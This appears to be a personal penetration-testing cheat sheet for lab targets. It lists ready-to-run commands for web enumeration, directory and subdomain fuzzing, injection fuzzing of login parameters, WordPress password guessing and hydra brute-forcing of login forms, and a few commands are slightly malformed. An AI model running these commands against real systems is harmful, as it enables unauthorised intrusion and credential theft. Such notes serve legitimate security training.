==============================================================================
[+] Versions
==============================================================================
# Versions of Server
whatweb google.com  

==============================================================================
[+] Subdomains
==============================================================================
# Large Directory 
wfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -H "Host: FUZZ.host.com" --hc 200 --hw 356 -t 100 10.10.10.101

==============================================================================
[+] Directories
==============================================================================
# Download Recursive Files in Web Page
wget -r http://10.10.10/images
wget -r --no-parent http://10.10.10/images

# Large Directory wfuzz
wfuzz -c --hc=404 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/IIS.fuzz.txt http://10.10.10.103/FUZZ

# 500 Threads wfuzz in cascade
wfuzz -t 500 -c --hc=404 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/IIS.fuzz.txt http://10.10.10.103/FUZZ/FUZ2Z/FUZ3Z/

# Common Directory gobuster
gobuster dir -u http://10.10.10.81/ -w /usr/share/wordlists/dirb/common.txt -t 64 -o gobuster.txt -s 204,301,302,307

# nmap web enum
nmap -p80 --script http.enum 10.10.10.88 -o nmapweb.txt
nmap -p80 --script http.enum.nse --script-args http-enum.basepath='webservices/' 10.10.10.88 -o nmapweb.txt

# CMS Wordpress
wfuzz -c --hc=404 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt http://10.10.10.88/webservices/wp/FUZZ

==============================================================================
[+] Fuzzing
==============================================================================

wfuzz -c -w "/usr/share/wordlists/wfuzz/Injections/All_attack.txt" -d "username=FUZZ&password=FUZZ&signIn=signIn" http:// 172.16.1.12/blog/blogadmin/index.php

wfuzz -c --hc=404 -w "/usr/share/wordlists/wfuzz/Injections/All_attack.txt" http://172.16.1.12/blog/blogadmin/index.php?signIn=FUZZ

proxychains wfuzz -c -z file,/usr/share/wordlists/wfuzz/Injections/All_attack.txt -u http://172.16.1.12/blog/blogadmin/checkMemberID.php?memberID=FUZZ
proxychains wfuzz -c -z file,/usr/share/wordlists/wfuzz/Injections/All_attack.txt -u http://172.16.1.12/blog/blogadmin/blogs_view.php?SelectedID=5 -b columns%2Fblog%2Fblogadmin%2Fblogs_view.php=FUZZ -b columns%2Fblog%2Fblogadmin%2Fblog_categories_view.php=FUZZ -b BLOG_ADMIN=FUZZ

proxychains proxychains wfuzz -c -z file,/usr/share/wordlists/wfuzz/Injections/All_attack.txt -u http://172.16.1.12/blog/blogadmin/blogs_view.php?SelectedID=FUZZ   






wpscan --url http://10.10.110.100:65000/wordpress/ --enumerate p,u,t
wpscan --url http://10.10.110.100:65000/wordpress/ –passwords /usr/share/wordlists/rockyou.txt –usernames admin, james

==============================================================================
[+] Passwords on Website
==============================================================================
cewl http://10.10.10.10 

==============================================================================
[+] Brute Force
==============================================================================
hydra -l harvey -P /usr/share/wordlists/metasploit/common_roots.txt internal-01.bart.htb http-form-post "/simple_chat/login.php:uname=^USER^&passwd=^PASS^&submit=Login:Password" 
hydra -L users.txt -P pass.txt 10.10.110.100 -s 65000 -V http-form-post '/wordpress/wp-login.php:log=^USER^&pwd=^PASS^Log+In&redirect_to=http%3A%2F%2F10.10.110.100%3A65000%2Fwordpress%2Fwp-admin%2F&testcookie=1:is incorrect'

